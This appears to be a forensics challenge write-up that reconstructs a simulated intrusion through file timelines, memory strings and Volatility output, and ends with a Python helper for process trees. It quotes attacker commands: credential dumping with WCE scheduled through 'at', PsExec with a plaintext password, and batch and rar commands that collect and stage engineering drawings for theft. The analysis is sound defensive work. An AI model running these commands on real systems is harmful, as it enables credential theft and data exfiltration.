132608 .a.. r/rrwxrwxrwx 0 0 23410-128-3 c:/WINDOWS/system32/msv1_0.dll
94720 .a.. r/rrwxrwxrwx 0 0 24143-128-3 c:/WINDOWS/system32/iphlpapi.dll
25088 .a.. r/rrwxrwxrwx 0 0 24431-128-3 c:/WINDOWS/system32/at.exe
344 mac. d/drwxrwxrwx 0 0 5458-144-1 c:/WINDOWS/Tasks
ENG-USTXHOU-148 - Checking the AT job
Status ID Day Time Command Line
--------------------------------------------------------------------------------
: 1 Today 7:30 PM wc.exe -e -o h.out
C:\WINDOWS\webui>ms, Average = 0ms
C:\WINDOWS\webui>
FLD-SARIYADH-43 - checking the scheduled task
546541-us ID Day Time Command Line
546542--------------------------------------------------------------------------------
546543: 1 Today 4:30 AM wc.exe -e -o h.out
546544-C:\WINDOWS\webui>
FLD-SARIYADH-43 - .bat file commands
copy c:\windows\webui\wc.exe c:\windows\system32
at 13:50 wc.exe -e -o h.out
IIS-SARIYADH-03 - At1.job found in memory.
at 04:30 wc.exe -e -o h.out
"At1.job" (wc.exe) 11/27/2012 4:30:00 AM ** ERROR **
Unable to start task.
The specific error is:
0x80070002: The system cannot find the file specified.
Try using the Task page Browse button to locate the application.
2012-11-27 01:30:00 - IIS-SARIYADH-03 - At1.job created.
Tue Nov 27 2012 01:30:00 322 mac. r/rrwxrwxrwx 0 0 10880-128-1 c:/WINDOWS/Tasks/At1.job
IIS-SARIYADH-03 - Appears to be an error when running wc.exe. Found in memory.
Error: cannot generate LM Hash.
Error: cannot generate NT Hash.
Hashes: :%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2XError: Cannot extract auxiliary DLL!
%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2XUsing WCE Windows Service...
abForced Safe Mode Error: cannot read credentials using 'safe mode'.
ab%.8X:%s:%s:%.2X:%.2X%.8X:%s:%s:%.2X:%.2Xab
something terrible happened! could not allocate memory for new list!
WCE %s (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernanampliasecurity.com)
Use -h for help.
Options:
-l List logon sessions and NTLM credentials (default).
Optional: -r<refresh interval>.
-s Changes NTLM credentials of current logon session.
Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
-o saves all output to a file.
-r Lists logon sessions and NTLM credentials indefinitely.
Refreshes every 5 seconds if new sessions are found.
-c Run <cmd> in a new session with the specified NTLM credentials.
Parameters: <cmd>.
-e Lists logon sessions NTLM credentials indefinitely.
Refreshes every time a logon event occurs.
Parameters: <filename
2012-11-27 01:30:00 - ENG-USTXHOU-148 - wce is run and dumps its results into h.out
Tue Nov 27 2012 01:30:00 208384 .ac. r/rrwxrwxrwx 0 0 11739-128-3 c:/WINDOWS/system32/wc.exe
322 mac. r/rrwxrwxrwx 0 0 11740-128-1 c:/WINDOWS/Tasks/At1.job
268 macb r/rrwxrwxrwx 0 0 11742-128-1 c:/WINDOWS/system32/h.out
2012-11-27 01:30:00 - FLD-SARIYADH-43 - wc.exe, h.out and At1.job are all touched: the job fires, wce runs, and the dumped credentials are stored in h.out
Tue Nov 27 2012 01:30:00 208384 .ac. r/rrwxrwxrwx 0 0 12031-128-3 c:/WINDOWS/system32/wc.exe
322 mac. r/rrwxrwxrwx 0 0 12032-128-1 c:/WINDOWS/Tasks/At1.job
268 macb r/rrwxrwxrwx 0 0 12034-128-1 c:/WINDOWS/system32/h.out
400 mac. d/drwxrwxrwx 0 0 29-144-6 c:/WINDOWS/system32
2012-11-27 01:30:10 - FLD-SARIYADH-43 - wc.exe is put in prefetch as an artifact of executing
Tue Nov 27 2012 01:30:10 10720 macb r/rrwxrwxrwx 0 0 12035-128-4 c:/WINDOWS/Prefetch/WC.EXE-06BFE764.pf
2012-11-27 01:30:10 - ENG-USTXHOU-148 - WC is in prefetch (could be residue from it just running)
Tue Nov 27 2012 01:30:10 10720 macb r/rrwxrwxrwx 0 0 11743-128-4 c:/WINDOWS/Prefetch/WC.EXE-06BFE764.pf
2012-11-27 01:32:36 - ENG-USTXHOU-148 - AT is still in prefetch
Tue Nov 27 2012 01:32:36 12948 mac. r/rrwxrwxrwx 0 0 11741-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf
2012-11-27 01:32:47 - FLD-SARIYADH-43 - at.exe is also placed in prefetch
Tue Nov 27 2012 01:32:47 12960 mac. r/rrwxrwxrwx 0 0 12033-128-4 c:/WINDOWS/Prefetch/AT.EXE-2770DD18.pf
2012-11-27 01:42:21 - ENG-USTXHOU-148 - memory is dumped
Tue Nov 27 2012 01:42:21 95104 m... r/rrwxrwxrwx 0 0 11744-128-3 c:/mdd.exe
2012-11-27 01:42:21 - FLD-SARIYADH-43 - mdd is running and the memory is being dumped.
Tue Nov 27 2012 01:42:21 95104 m... r/rrwxrwxrwx 0 0 12037-128-3 c:/Documents and Settings/amirs/mdd.exe
95104 m... r/rrwxrwxrwx 0 0 12038-128-3 c:/mdd.exe
2012-11-27 01:42:21 - IIS-SARIYADH-03 - mdd ran and memory was dumped.
Tue Nov 27 2012 01:42:21 95104 m... r/rrwxrwxrwx 0 0 10882-128-3 c:/mdd.exe
Tue Nov 27 2012 01:50:07 144 mac. r/rrwxrwxrwx 0 0 9700-128-307 c:/WINDOWS/system32/config/netlogon.ftl
Tue Nov 27 2012 01:50:26 1487 .a.. r/rrwxrwxrwx 0 0 10553-128-4 c:/Documents and Settings/saadmin/Start Menu/Programs/Accessories/Windows Explorer.lnk
Tue Nov 27 2012 01:50:29 295936 .a.. r/rrwxrwxrwx 0 0 253-128-3 c:/WINDOWS/system32/winsrv.dll
Tue Nov 27 2012 01:50:54 56 .a.. d/drwxrwxrwx 0 0 10151-144-5 c:/Documents and Settings/saadmin
Tue Nov 27 2012 01:51:00 1024 mac. r/rr-xr-xr-x 0 0 10588-128-4 c:/Documents and Settings/saadmin/ntuser.dat.LOG
Tue Nov 27 2012 01:51:38 95104 .acb r/rrwxrwxrwx 0 0 10882-128-3 c:/mdd.exe
Tue Nov 27 2012 01:52:37 536334336 ...b r/rrwxrwxrwx 0 0 10883-128-4 c:/iis-memdump.bin
Tue Nov 27 2012 01:52:43 1024 .a.. r/rr-xr-xr-x 0 0 3372-128-3 c:/WINDOWS/system32/config/system.LOG
Tue Nov 27 2012 01:52:44 1024 m.c. r/rr-xr-xr-x 0 0 3372-128-3 c:/WINDOWS/system32/config/system.LOG
Tue Nov 27 2012 01:52:52 536334336 mac. r/rrwxrwxrwx 0 0 10883-128-4 c:/iis-memdump.bin
Tue Nov 27 2012 01:53:20 44032 .a.. r/rrwxrwxrwx 0 0 1195-128-3 c:/WINDOWS/system32/ftp.exe
Tue Nov 27 2012 01:54:37 1024 mac. r/rr-xr-xr-x 0 0 3373-128-3 c:/WINDOWS/system32/config/software.LOG
Misc commands found in memory that don’t have a home.
ENG-USTXHOU-148 - Running ipconfig on 172.16.223.47 (IIS-SARIYADH-03)
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
Copying C:\WINDOWS\system32\ipconfig.exe to 172.16.223.47...
FLD-SARIYADH-43 - Contents of a .bat file, seeking out all .dwg files on the drive
FILE0
@echo off
dir /S C:\*.dwg > c:\windows\webui\https.dll
ENG-USTXHOU-148 - Attacker runs dir against the directory C:\Engineering\Designs\Pumps
Volume in drive C has no label.
Volume Serial Number is 9CC4-949D
Directory of C:\Engineering\Designs\Pumps
11/24/2012 10:50 PM 2,048,000 pump1.dwg
11/24/2012 10:50 PM 2,048,000 pump10.dwg
11/24/2012 10:50 PM 2,048,000 pump100.dwg
...snip...
11/24/2012 10:51 PM 2,048,000 pump71.dwg
11/24/2012 10:51 PM 2,048,000 pump72.dwg
11/24/2012 10:51 PM 2,048,000 pump73.dwg
11/24/2012 10:51 PM 2,048,000 pump74.dwg
11/24/2012 10:51 PM 2,048,000 pump75.dwg
11/24/2012 10:51 PM 2,048,000 pump76.dwg
11/24/2012 10:51 PM 2,048,000 pump77.dwg
11/24/2012 10:51 PM 2,048,000 pump78.dwg
11/24/2012 10:51 PM 2,048,000 pump79.dwg
11/24/2012 10:51 PM 2,048,000 pump8.dwg
FLD-SARIYADH-43 - Rar command to bundle up everything in the C:\Engineering\Designs\Pumps directory (minus the dlls) and name the archive netstat.dll
c:\windows\webui\ra.exe a -hphclllsddlsdiddklljh -r c:\windows\webui\netstat.dll "C:\Engineering\Designs\Pumps" -x*.dll
Backdoor PID
One of the challenge questions was to find the PID of the backdoor. To begin, we can list the running processes with Volatility's pslist plugin.
$ vol.py -f memdump.bin --profile=WinXPSP2x86 pslist
Volatile Systems Volatility Framework 2.2
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ -------------------- --------------------
0x823c8830 System 4 0 51 271 ------ 0
0x821841c8 smss.exe 356 4 3 19 ------ 0 2012-11-26 22:03:28
0x821b0020 csrss.exe 604 356 12 351 0 0 2012-11-26 22:03:29
0x82189da0 winlogon.exe 628 356 18 653 0 0 2012-11-26 22:03:29
0x82194650 services.exe 680 628 15 243 0 0 2012-11-26 22:03:30
0x82244020 lsass.exe 692 628 22 407 0 0 2012-11-26 22:03:30
0x8219e2c8 svchost.exe 852 680 14 187 0 0 2012-11-26 22:03:31
0x82192b10 svchost.exe 940 680 9 258 0 0 2012-11-26 22:03:31
0x820b3da0 svchost.exe 1024 680 76 1645 0 0 2012-11-26 22:03:32
0x821a62e0 svchost.exe 1068 680 5 81 0 0 2012-11-26 22:03:32
0x821a3c10 svchost.exe 1116 680 14 248 0 0 2012-11-26 22:03:33
0x822e9700 spoolsv.exe 1348 680 10 105 0 0 2012-11-26 22:03:34
0x8203c020 alg.exe 1888 680 6 105 0 0 2012-11-26 22:03:35
0x8204f020 explorer.exe 284 244 9 372 0 0 2012-11-26 22:03:58
0x82226650 msmsgs.exe 548 284 3 204 0 0 2012-11-26 22:04:03
0x822408d0 ctfmon.exe 556 284 1 75 0 0 2012-11-26 22:04:03
0x82045da0 wuauclt.exe 1628 1024 3 142 0 0 2012-11-26 22:04:43
0x821feda0 msimn.exe 1984 284 7 359 0 0 2012-11-26 22:06:33
0x82049690 wc.exe 364 1024 1 27 0 0 2012-11-27 01:30:00
0x822d0828 cmd.exe 1796 284 1 33 0 0 2012-11-27 01:56:21
0x820b13b8 mdd.exe 244 1796 1 24 0 0 2012-11-27 01:57:28
Unfortunately, none of these processes stands out as malicious on its own. However, we can check the DLLs loaded by each.
$ vol.py -f memdump.bin --profile=WinXPSP2x86 dlllist
svchost.exe pid: 1024
Command line : C:\WINDOWS\System32\svchost.exe -k netsvcs
Service Pack 3
...snip...
0x50640000 0xc000 C:\WINDOWS\system32\wups.dll
0x5f740000 0xe000 C:\WINDOWS\System32\wbem\ncprov.dll
0x10000000 0x1c000 c:\windows\system32\6to4ex.dll
0x73b80000 0x12000 c:\windows\system32\AVICAP32.dll
0x75a70000 0x21000 c:\windows\system32\MSVFW32.dll
...snip...
And we see our backdoor.
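As an added example (not the write-up's own code), the following Python turns the pslist output above into a process tree and pulls out what started during the intrusion window; the sample rows are copied from that listing, trimmed to the processes used here, and process names are assumed to contain no spaces.

```python
# Added example (not the write-up's own code): turn the Volatility pslist output
# above into a process tree and pull out what started during the intrusion.
# PSLIST is copied from that listing, trimmed; process names are assumed to have no spaces.
from datetime import datetime
from typing import Dict, List, Optional, Tuple

PSLIST = """\
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ -------------------- --------------------
0x823c8830 System 4 0 51 271 ------ 0
0x821841c8 smss.exe 356 4 3 19 ------ 0 2012-11-26 22:03:28
0x82189da0 winlogon.exe 628 356 18 653 0 0 2012-11-26 22:03:29
0x82194650 services.exe 680 628 15 243 0 0 2012-11-26 22:03:30
0x820b3da0 svchost.exe 1024 680 76 1645 0 0 2012-11-26 22:03:32
0x8204f020 explorer.exe 284 244 9 372 0 0 2012-11-26 22:03:58
0x82045da0 wuauclt.exe 1628 1024 3 142 0 0 2012-11-26 22:04:43
0x82049690 wc.exe 364 1024 1 27 0 0 2012-11-27 01:30:00
0x822d0828 cmd.exe 1796 284 1 33 0 0 2012-11-27 01:56:21
0x820b13b8 mdd.exe 244 1796 1 24 0 0 2012-11-27 01:57:28
"""


class Proc:
    def __init__(self, name: str, pid: int, ppid: int, start: Optional[datetime]):
        self.name, self.pid, self.ppid, self.start = name, pid, ppid, start


def parse_pslist(text: str) -> Dict[int, Proc]:
    """Parse pslist rows keyed by PID. Start is two tokens (date, time); System has none."""
    procs: Dict[int, Proc] = {}
    for line in text.splitlines():
        t = line.split()
        if len(t) < 8 or not t[0].startswith("0x"):
            continue  # header, separator or blank line
        start = datetime.strptime(f"{t[8]} {t[9]}", "%Y-%m-%d %H:%M:%S") if len(t) >= 10 else None
        procs[int(t[2])] = Proc(t[1], int(t[2]), int(t[3]), start)
    return procs


def parent_of(procs: Dict[int, Proc], proc: Proc) -> Optional[Proc]:
    """Resolve PPID, but refuse a 'parent' that started after its child: PIDs get reused,
    and explorer.exe's PPID 244 here points at mdd.exe, which did not exist yet."""
    parent = procs.get(proc.ppid)
    if parent is None or (parent.start and proc.start and parent.start > proc.start):
        return None
    return parent


def ancestry(procs: Dict[int, Proc], pid: int) -> List[str]:
    """Walk from a PID up to System, naming parents that have already exited by PID only."""
    chain, cur = [], procs[pid]
    while True:
        chain.append(cur.name)
        if cur.ppid == 0:
            return chain
        parent = parent_of(procs, cur)
        if parent is None:
            chain.append(f"<exited pid {cur.ppid}>")
            return chain
        cur = parent


def started_after(procs: Dict[int, Proc], cutoff: str) -> List[Tuple[str, int]]:
    """Processes started at or after the cutoff, oldest first: the intrusion-window view."""
    t0 = datetime.strptime(cutoff, "%Y-%m-%d %H:%M:%S")
    hits = [p for p in procs.values() if p.start and p.start >= t0]
    return [(p.name, p.pid) for p in sorted(hits, key=lambda p: p.start)]
```

Running started_after on the 2012-11-27 cutoff yields wc.exe, cmd.exe and mdd.exe, and ancestry shows wc.exe (PID 364) was spawned by svchost.exe PID 1024, the same process hosting 6to4ex.dll.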